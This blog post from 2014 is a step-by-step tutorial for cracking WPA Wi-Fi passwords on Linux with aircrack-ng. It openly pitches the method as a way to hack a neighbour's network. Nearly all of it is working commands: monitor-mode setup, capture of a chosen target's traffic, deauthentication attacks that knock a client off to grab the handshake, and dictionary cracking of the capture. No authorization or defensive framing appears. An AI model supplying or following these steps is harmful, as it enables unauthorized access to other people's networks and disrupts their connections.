How to Hack wifi with linux

Written By Unknown on Friday, December 5, 2014 | 8:08 PM

How to Hack Wi-fi with with linux.

Hi Carboners .. today i am going to show you how to Hack wifi with linux..
This is very useful if you wanna hack your neighborhood's wifi..
Okay , these are what we need:
1. Computer
2. Linux Distros. ( You may use backtrack, kali linux, backbox, ubuntu , or etc)
3. Install the aircrack-ng
4. wordlist

Here we go:

1. Firstly, install the aircrack-ng . ( If you are using backtrack, kali linux, or backbox, skip this step ,       because those distro comes with aircrack-ng pre-installed)
    If you are using ubuntu 14.04 . you simply open the terminal  (ctrl + alt + t ) and type this                    command " sudo apt-get install aircrack-ng"(without quotes) , and wait until the process finish
2.Stop all process that will disturb aireplay-ng ( Aireplay is part of Aircrack)
   with this command : sudo airmon-ng check kill
3. make new interface with airmon-ng
   command : airmon-ng start wlan0
4. scan available wifi near you.
  command : airodump-ng mon0
5. Choose your target and press ctrl + c
6. run this command  sudo airodump-ng --write output --channel 6 --bssid 58:6D:8F:3D:55:E8 mon0
  Explanation : --write : write and save the result from airodump-ng
  output        : the name of file from --write command ( you may name it anything. it's up to you)
 --channel    : target's access point channel
--bssid          : target's bssid
and change 58:6D:8F:3D:55:E8 with your target bssid
7. Run aireplay-ng to get WPA  Handshake
command :  aireplay-ng --deauth 1 -a 58:6D:8F:3D:55:E8 -c E0:B9:A5:9D:18:94 mon0
Explanation : 

  --deauth : deauthenticate mode
  -a : access's point mac address
   -c : client's mac address

8. after you got WPA handshake from client, press ctrl + c and type this command  sudo aircrack-ng output-01.cap -w /root/crack wpa.txt
-w is to activate dictionary mode
Note: change the "output" with the name that you put on the 6th step

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